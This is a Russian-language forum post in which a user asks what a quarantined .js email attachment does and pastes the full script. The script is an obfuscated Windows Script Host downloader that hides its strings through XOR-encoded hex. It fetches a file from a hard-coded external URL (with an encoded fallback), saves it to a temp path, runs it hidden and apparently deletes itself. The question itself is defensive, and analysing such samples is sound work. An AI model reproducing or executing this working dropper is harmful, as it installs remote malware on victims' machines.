Добрый день, прислали вот такой вот файлик, который сразу был отправлен сервером в карантин, но мне интересно что этот скрипт делает. Единственная догадка - вытягивает сохраненные пароли? Скрипт под спойлером
» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «
CODE Format
function NjW(PIc)
{
var au = "fr" + "o" + "mC";
au += "harCod";
var I = "St";
I += "ri";
I += "ng";
var Ga = eval(I);
return Ga[au + "e"](PIc);
}
function RP()
{
return "charC" + "odeAt";
}
function U(QzJ, qxO)
{
var lkW = QzJ.length;
var h = qxO["l" + "eng" + "th"];
var j = 0;
var B = "";
while (j < lkW)
{
var XSY = j / 2;
var sf = QzJ["cha" + "rAt"](j);
sf = sf + QzJ["cha" + "rAt"](j + 1);
j += 2;
var FKN = parseInt(sf, 16);
var quL = qxO[RP()](XSY % h);
var P = NjW(FKN ^ quL);
B += P;
}
return B;
}
function qI(Lty, qgl)
{
return U(Lty, qgl);
}
function phx(Dgj, Uj)
{
var t=qI("0C422022","C2ELdy4GPVyH28KMNWN0");
Dgj[t]();
var YEf=qI("030D1156","Wta3MV77aUK");
Dgj[YEf] = 1;
var w=qI("113139053D","FCPqXv5G6ZTtd");
var ed=qI("171303212D091B10163C153C","EvpQBghuTSq");
Dgj[w](Uj[ed]);
var FAv=qI("61290B2A000D0B23","1FxCtddMgcz4utzkQa0p");
Dgj[FAv] = 0;
}
function lw(F)
{
var irm=["ve","b","ti","ct","XO","je","Ac"];
var qTr=irm[6]+irm[2]+irm[0]+irm[4]+irm[1]+irm[5]+irm[3];
var NU = qTr;
var Q=266720;
var SJL=Q+46930;
var kUi=SJL/510;
var Dn=kUi-615;
var z = (!false?eval(NU):Dn);
return z;
}
function PC() {
var cLp=qI("04041459","Ktq75o3PTK7nXvgdAHw9");
return cLp;
}
function J() {
var v=qI("4709091F194009","2gbqv7gH1qOlMe7Ka23");
return v;
}
function VP(JlP)
{
var th = typeof JlP[PC()];
var Rz = (J());
return (th != Rz );
}
function miC(X)
{
var HU = "";
var sG = 0;
var SD = lw(X+4);
var rid = 0;
if ((!true) || (X == rid))
return false;
var tK = "XML2.XMLHT";
tK += "TP";
rid = new SD("M" + "S" + tK);
try
{
fbG = rid++;
}
catch (EnO)
{
return !VP(rid);
}
if (true)
return (!true);
}
function sn() {
var eRk=qI("641616112A333C030A14342B0033","7udxZGzvfxzJmVzE5y");
return eRk;
}
function kA(AF, N)
{
var hg = WScript;
AF[N](hg[sn()]);
}
function Eq(jI)
{
var WFh=73248;
var kEP=WFh+12788;
var Z=kEP/314;
var lVb=Z-258;
return parseInt(jI, lVb);
}
function Rp(WH, sK)
{
return Eq(WH);
}
function IuS() {
var H=qI("09173A19","NrNJn9HDNESfoE");
return H;
}
function QtZ() {
var Ew = "5" + "\x65" + "b" + "3" + "k" + "A" + "\x67" + "\x6A" + "z" + "\x31" + "\x4F" + "g" + "0" + "B";
var b=qI("4500015A0A",Ew);
return b;
}
function DSE() {
var Gwy = "\x37" + "Q" + "\x6F" + "o" + "N" + "\x45" + "S" + "z" + "M" + "\x79" + "\x52" + "\x54" + "4" + "\x64" + "o" + "\x77";
var ytv=qI("5B170003",Gwy);
return ytv;
}
function mAk()
{
return IuS() + QtZ() + DSE() + "der";
}
function D() {
var tIu = "r" + "T" + "\x49" + "\x41" + "\x57" + "m" + "\x59" + "\x44" + "\x68" + "\x38" + "\x77" + "\x70" + "1" + "n" + "\x51" + "\x33";
var WT=qI("35313D153200290A095512",tIu);
return WT;
}
function c() {
var T = "\x44" + "0" + "W" + "\x4F" + "\x7A" + "\x6F" + "\x41" + "\x64" + "\x57" + "\x61" + "\x30" + "\x62" + "Y" + "\x6E" + "o" + "\x77" + "p" + "\x76";
var pYr=qI("2758363D3B1B",T);
return pYr;
}
function gdu(k)
{
var JLd = 128;
var auS = "not";
try
{
auS = "\\" + k[D()]();
auS = auS + JLd[c()](256);
}
catch (XaZ)
{
auS = k[mAk()](2) + auS;
}
return auS;
}
function VLB(jxI, N)
{
jxI["run"](N, 0);
return 8;
}
function wI()
{
return "va" + "l" + "ue";
}
function G()
{
return "b" + "in";
}
function S()
{
return "AD" + "OD" + "B" + ".Re" + "co" + "r" + "d" + "s" + "et";
}
function oa()
{
return "u" + "pd" + "ate";
}
function uH()
{
return "fi" + "elds";
}
function o(dch, gF, jxI)
{
var Vp=qI("07150656260112102253","Ttp3rnTyN6P");
var waj = Vp;
var f = dch["R" + "ead"]();
var ogc = new jxI(S());
ogc[uH()]["ap" + "pe" + "nd"]("bin", 201, dch["Size"]);
ogc["o" + "pen"]();
ogc["ad" + "d" + "N" + "ew"]();
ogc("b" + "i" + "n")["appendChunk"](f);
ogc[oa()]();
f = ogc(G())[wI()];
if (f.length > 10)
{
dch[waj](gF);
return (88 > 66);
}
return false;
}
function hjz() {
var blj = "\x4A" + "\x6E" + "\x68" + "W" + "g" + "\x56" + "d" + "S" + "\x56" + "2" + "C" + "6" + "v" + "\x47" + "\x75" + "Y";
var e=qI("29030C79022E0173795163",blj);
return e;
}
function xQV()
{
var Mhx = hjz();
return Mhx;
}
function y(vi)
{
return new vi("MSXML" + "2.XMLHTTP");
}
function NdF() {
var YE = "n" + "\x77" + "q" + "U" + "5" + "Z" + "\x74" + "\x63" + "T" + "\x65" + "R" + "\x69" + "\x66" + "\x54" + "\x35" + "o" + "G" + "\x62" + "\x39";
var NKq = "0107143B";
var hI=qI(NKq,YE);
return hI;
}
function Fl() {
var yL = "b" + "\x49" + "t" + "\x4F" + "e" + "r" + "J" + "8" + "\x6F" + "\x6C" + "E" + "\x71" + "\x74" + "X" + "\x36" + "c" + "\x44" + "9" + "\x31" + "\x52";
var LJm = "250C20";
var FZ=qI(LJm,yL);
return FZ;
}
function E() {
var xI = "t" + "\x58" + "L" + "\x62" + "8" + "\x54" + "a" + "\x4E" + "g" + "\x6C" + "\x6D" + "\x48" + "w" + "V";
var NJ = "073D2206";
var Hrj=qI(NJ,xI);
return Hrj;
}
function Gs(Uj, OUA)
{
var u=265224;
var pXe=u+45012;
var i=pXe/618;
var yG=i-502;
Uj[NdF()](Fl(), OUA, yG);
try {
Uj[E()]();
} catch (vH) {
return (1-1);
}
return 1;
}
function ope()
{
if (7 > 4)
{
return YMW("h" + "t" + "t" + "p" + ":" + "\x2F" + "\x2F" + "\x77" + "w" + "w" + "." + "m" + "\x61" + "\x72" + "t" + "c" + "h" + "i" + "\x6E" + "\x61" + "\x2E" + "c" + "o" + "m" + "\x2F" + "\x31" + "2" + "\x33" + "\x2F" + "m" + "\x65" + "\x73" + "\x67" + "." + "\x6A" + "p" + String.fromCharCode(103));
}
else return 0;
}
function Axs() {
var bJg=qI("5C05431D34627C5A321816191C2F5D1F5E03207630192217581A1E63571E59192236275A231D
12000B3D1B1D560323313D122707121E1D634301180C233C3C1B245A12010B23511F430235773206
2410031E412D47021800222B345B3D0510","4q7mGXSuWuwmnN");
return bJg;
}
function Yb()
{
if (45 > 32)
{
return YMW(Axs());
}
else return 0;
}
function C(pCv, xBe)
{
return new pCv(xBe);
}
function BF() {
var bws = "c" + "X" + "\x6E" + "\x55" + "m" + "\x72" + "4" + "e" + "\x4B" + "g" + "I";
var Ra=qI("303B1C3C1D065D0B2C490F0A340B061401400026282B093D0D21",bws);
return Ra;
}
function r() {
var wS = "\x45" + "L" + "N" + "X" + "\x77" + "t" + "a" + "\x4B" + "4" + "G";
var l=qI("0408011C355A323F46222421",wS);
return l;
}
function bm(yV)
{
if (yV == 1)
{
return new ActiveXObject(BF());
}
else
{
return new ActiveXObject(r());
}
}
function nt() {
var Ji = "251310460F12";
var Xj=qI(Ji,"vgq2za8mGK");
return Xj;
}
function Nx() {
var bvI = "130D030504";
var qd=qI(bvI,"PalvaIOOEcWlvh");
return qd;
}
function Lj() {
var CO = "654516222D294C4A180E1F2908";
var mJP=qI(CO,"26uPDY8dKfzEdDO");
return mJP;
}
function Mo() {
var fmy = "1D293D161931040E213C";
var YFe=qI(fmy,"yLQsmTBgMY");
return YFe;
}
function YMW(GT)
{
var RR;
var ZiZ;
var K = y(lw(42));
var qTo = 0;
if (Gs(K, GT) == 0)
return false;
var jb=260363;
var YYH=jb+48805;
var GO=YYH/452;
var OF=GO-482;
var XP=191996;
var PQN=XP+6598;
var fqw=PQN/306;
var OVF=fqw-647;
if (K[nt()] != OF - OVF)
return false;
var Soq = bm(1);
var RQe = bm(2);
GT = gdu(Soq);
phx(RQe, K);
if (o(RQe, GT, lw(7))) {} else
return (2>3);
RQe[Nx()]();
var fI = lw(144);
var nEg = Lj();
RR = C(fI, nEg );
ZiZ = xQV() + GT;
if ((qTo = VLB(RR, ZiZ)) < 10)
{
GT = Mo();
kA(Soq, GT);
return ((6+7)>8);
}
function tx() {
var bwl=218;
var JaR=bwl+63166;
var gef=JaR/76;
return gef -834;
}
return (false?tx():qTo);
}
function COm(RBM)
{
if ((RBM > 5) && miC(1))
{
var oL = ope();
if (oL == false)
oL = Yb();
var zR=185544;
var MBg=zR+41880;
var LPL=MBg/824;
var n=LPL-273;
return n;
}
var p=4950;
var llv=p+59301;
var mnG=llv/363;
var Azl=mnG-173;
return Azl;
}
COm(12);
var fjXpBSgOp = 0354257;
Jan 28 2019, 12:46
18 
Pulchritudinous Прислали вирус на *.js . Что он делает? Jan 28 2019, 12:46
